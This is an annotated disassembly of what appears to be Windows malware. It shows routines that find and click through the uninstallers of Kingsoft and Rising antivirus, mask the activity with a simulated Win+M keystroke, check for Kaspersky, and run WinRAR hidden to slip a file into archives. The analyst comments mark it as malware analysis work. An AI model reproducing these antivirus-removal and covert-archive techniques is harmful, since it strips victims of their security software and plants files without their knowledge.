seg001:0040DAB5 push offset s_2008 ; "金山毒霸 2008 杀毒套装卸载程序" (Kingsoft AV 2008 suite uninstaller)
seg001:0040DABA push offset s_32770_1 ; "#32770" = standard dialog class
seg001:0040DABF call FindWindowA
seg001:0040DABF
seg001:0040DAC4 mov ebx, eax ; dialog hwnd (may be NULL)
seg001:0040DAC6 push offset s_N> ; "下一步(&N) >" ("Next >")
seg001:0040DACB push offset s_Button_0 ; "Button"
seg001:0040DAD0 push 0 ; hwndChildAfter = NULL
seg001:0040DAD2 push ebx ; hwndParent
seg001:0040DAD3 call FindWindowExA
seg001:0040DAD3
seg001:0040DAD8 mov ebx, eax ; button hwnd
seg001:0040DADA push 0 ; lParam
seg001:0040DADC push 0 ; wParam
seg001:0040DADE push 0F5h ; Msg = BM_CLICK
seg001:0040DAE3 push ebx ; hWnd
seg001:0040DAE4 call SendMessageA ; click "Next"
seg001:0040DAE4
seg001:0040DAE9 push 0 ; lParam
seg001:0040DAEB push 0 ; wParam
seg001:0040DAED push 0F5h ; Msg = BM_CLICK
seg001:0040DAF2 push ebx ; hWnd
seg001:0040DAF3 call SendMessageA ; click "Next" again (second wizard page, presumably)
seg001:0040DAF3
seg001:0040DAF8 push 320h ; dwMilliseconds = 800
seg001:0040DAFD call Sleep ; let the wizard advance
seg001:0040DAFD
seg001:0040DB02 push offset s_2008 ; "金山毒霸 2008 杀毒套装卸载程序"
seg001:0040DB07 push offset s_32770_1 ; "#32770"
seg001:0040DB0C call FindWindowA
seg001:0040DB0C
seg001:0040DB11 mov ebx, eax
seg001:0040DB13 push offset s_U ; "卸载(&U)" ("Uninstall")
seg001:0040DB18 push offset s_Button_0 ; "Button"
seg001:0040DB1D push 0 ; hwndChildAfter = NULL
seg001:0040DB1F push ebx ; hwndParent
seg001:0040DB20 call FindWindowExA
seg001:0040DB20
seg001:0040DB25 mov ebx, eax
seg001:0040DB27 push 0 ; lParam
seg001:0040DB29 push 0 ; wParam
seg001:0040DB2B push 0F5h ; Msg = BM_CLICK
seg001:0040DB30 push ebx ; hWnd
seg001:0040DB31 call SendMessageA ; click "Uninstall"
seg001:0040DB31
seg001:0040DB36 push 0 ; lParam
seg001:0040DB38 push 0 ; wParam
seg001:0040DB3A push 0F5h ; Msg = BM_CLICK
seg001:0040DB3F push ebx ; hWnd
seg001:0040DB40 call SendMessageA
seg001:0040DB40
seg001:0040DB45 push 0BB8h ; dwMilliseconds = 3000
seg001:0040DB4A call Sleep ; wait for the uninstall to run
seg001:0040DB4A
seg001:0040DB4F push 0 ; lpWindowName = NULL (any title)
seg001:0040DB51 push offset s_Ieframe_0 ; "IEFrame" = Internet Explorer top-level class
seg001:0040DB56 call FindWindowA
seg001:0040DB56
seg001:0040DB5B mov ebx, eax
seg001:0040DB5D push 1 ; lParam
seg001:0040DB5F push 0F060h ; wParam = SC_CLOSE
seg001:0040DB64 push 112h ; Msg = WM_SYSCOMMAND
seg001:0040DB69 push ebx ; hWnd
seg001:0040DB6A call SendMessageA ; close the IE window
seg001:0040DB6A
seg001:0040DB6F pop ebx
seg001:0040DB70 retn
seg001:0040DB70
seg001:0040DB70 KillDuBa endp
命令行模式:
A ——添加文件到压缩包
-ep ——添加文件时不包含路径信息
-u ——更新文件
-inul ——禁止错误提示信息
代码:
; Build and run (hidden, uCmdShow = 0 = SW_HIDE) a WinRAR command line.
; Five pieces are concatenated by sub_403E0C (edx = 5):
;   <dword_4149D4> + "\WinRAR.exe a -ep -u -inul " + <dword_4149D0> +
;   <dword_40FF5C> + <[ebp+uCmdShow]>
; 'a' add to archive, '-ep' strip paths, '-u' update, '-inul' suppress error
; messages: i.e. silently add/refresh a file inside an existing .rar. Which
; archive and which file (the two globals and the local) is not visible in
; this excerpt. IDA's "uCmdShow" name on [ebp+uCmdShow] is a mis-propagated
; label -- it is a string piece; the real uCmdShow is the 'push 0' at
; 0040F7E6 consumed by the WinExec at the end. WinExec's result is ignored.
seg001:0040F7E6 push 0 ; uCmdShow for WinExec below (SW_HIDE), pushed early
seg001:0040F7E8 push dword_4149D4 ; piece 1: presumably the WinRAR install directory (not shown)
seg001:0040F7EE push offset s_Winrar_exeA-e ; "\\WinRAR.exe a -ep -u -inul "
seg001:0040F7F3 push dword_4149D0 ; piece 3 (archive path? not shown)
seg001:0040F7F9 push offset dword_40FF5C ; piece 4 (presumably a separator literal)
seg001:0040F7FE push [ebp+uCmdShow] ; piece 5: a string, despite IDA's label
seg001:0040F801 lea eax, [ebp+var_1F4]
seg001:0040F807 mov edx, 5 ; concatenate 5 pieces -> var_1F4
seg001:0040F80C call sub_403E0C
seg001:0040F80C
seg001:0040F811 mov eax, [ebp+var_1F4]
seg001:0040F817 call sub_403F4C ; string -> C pointer
seg001:0040F817
seg001:0040F81C push eax ; lpCmdLine
seg001:0040F81D call WinExec ; run WinRAR hidden; result ignored
代码:
; Part of `start` (see the XREF on loc_411387): remove Rising (瑞星) AV by
; driving its own uninstaller, then test for Kaspersky. Steps:
;   sub_4076E8("RavMon.exe") -> al == 1 when the Rising monitor is present
;     (helper not shown; presumably a running-process or file check)
;   RegQueryValue(HKLM, "SOFTWARE\rising\Rav", "installpath") -> var_1D0
;   keybd_event(5Bh = VK_LWIN) ... keybd_event(4Dh = 'M'): Win+M minimises
;     all windows so the user does not see what follows (the 'M' press and
;     key-up events are elided with "......")
;   WinExec("<[off_413554]>\Update\setup.exe", 1 = SW_SHOWNORMAL) -- the
;     prefix is presumably the Rising install path read above; verify
;   Sleep(5DCh = 1500 ms); CreateThread(sub_40DBC8) -- presumably a
;     dialog-clicker in the style of KillDuBa (not shown); Sleep(0DACh = 3500 ms)
;   loc_411387: sub_4076E8("avp.exe"); al != 1 (Kaspersky absent) jumps to the
;     analyst-labelled `uninstall`; the Kaspersky-present path falls through
;     and is elided.
; Review notes: RegQueryValue / WinExec / CreateThread results are unchecked;
; hard-coded process names are trivially evaded by a renamed AV binary; the
; synthetic Win+M keystroke burst from a non-interactive process is a noisy
; behavioural indicator.
seg001:0041129F mov eax, offset s_Ravmon_exe ; "RavMon.exe"
seg001:004112A4 call sub_4076E8 ; is Rising present? (helper not shown)
seg001:004112A4
seg001:004112A9 cmp al, 1
seg001:004112AB jnz loc_411387 ; no Rising -> go test for Kaspersky
seg001:004112AB
seg001:004112B1 lea eax, [ebp+var_1D0]
seg001:004112B7 push eax ; out buffer for the value
seg001:004112B8 mov ecx, offset s_Installpath ; "installpath"
seg001:004112BD mov edx, offset s_SoftwareRisin ; "SOFTWARE\\rising\\Rav"
seg001:004112C2 mov eax, 80000002h ; HKEY_LOCAL_MACHINE
seg001:004112C7 call RegQueryValue ; register-convention wrapper; result ignored
......
seg001:004112D7
seg001:004112DC push 0 ; dwExtraInfo
seg001:004112DE push 0 ; dwFlags = 0 -> key down
seg001:004112E0 push 0 ; uMapType = MAPVK_VK_TO_VSC
seg001:004112E2 push 5Bh ; uCode = VK_LWIN (left Windows key)
seg001:004112E4 call MapVirtualKeyA
seg001:004112E4
seg001:004112E9 push eax ; bScan
seg001:004112EA push 5Bh ; bVk = VK_LWIN
seg001:004112EC call keybd_event ; press Win ...
seg001:004112EC
seg001:004112F1 push 0 ; dwExtraInfo
seg001:004112F3 push 0 ; dwFlags
seg001:004112F5 push 0 ; uMapType
seg001:004112F7 push 4Dh ; uCode = 'M' -> Win+M = minimise all windows
seg001:004112F9 call MapVirtualKeyA
......
seg001:0041132B
seg001:00411330 push 1 ; uCmdShow = SW_SHOWNORMAL for WinExec below
seg001:00411332 mov edx, off_413554
seg001:00411338 mov edx, [edx] ; prefix string (presumably Rising install path)
seg001:0041133A lea eax, [ebp+var_1D4]
seg001:00411340 mov ecx, offset s_UpdateSetup_e ; "\\Update\\setup.exe"
seg001:00411345 call sub_403D98 ; var_1D4 = prefix + "\Update\setup.exe"
seg001:00411345
seg001:0041134A mov eax, [ebp+var_1D4]
seg001:00411350 call sub_403F4C ; string -> C pointer
seg001:00411350
seg001:00411355 push eax ; lpCmdLine
seg001:00411356 call WinExec ; launch Rising's own setup (uninstall path); result ignored
seg001:00411356
seg001:0041135B push 5DCh ; dwMilliseconds = 1500
seg001:00411360 call Sleep ; give the setup UI time to appear
seg001:00411360
seg001:00411365 mov eax, lpThreadId
seg001:0041136A push eax ; lpThreadId (global)
seg001:0041136B push 0 ; dwCreationFlags
seg001:0041136D push 0 ; lpParameter
seg001:0041136F push offset sub_40DBC8 ; lpStartAddress (not shown; presumably clicks through the setup dialogs)
seg001:00411374 push 0 ; dwStackSize
seg001:00411376 push 0 ; lpThreadAttributes
seg001:00411378 call CreateThread ; handle discarded
seg001:00411378
seg001:0041137D push 0DACh ; dwMilliseconds = 3500
seg001:00411382 call Sleep
seg001:00411382
seg001:00411387
seg001:00411387 loc_411387: ; CODE XREF: start+E47j
seg001:00411387 mov eax, offset s_Avp_exe ; "avp.exe" (Kaspersky)
seg001:0041138C call sub_4076E8 ; same presence check
seg001:0041138C
seg001:00411391 cmp al, 1
seg001:00411393 jnz uninstall ...... ; Kaspersky absent -> `uninstall`; present path elided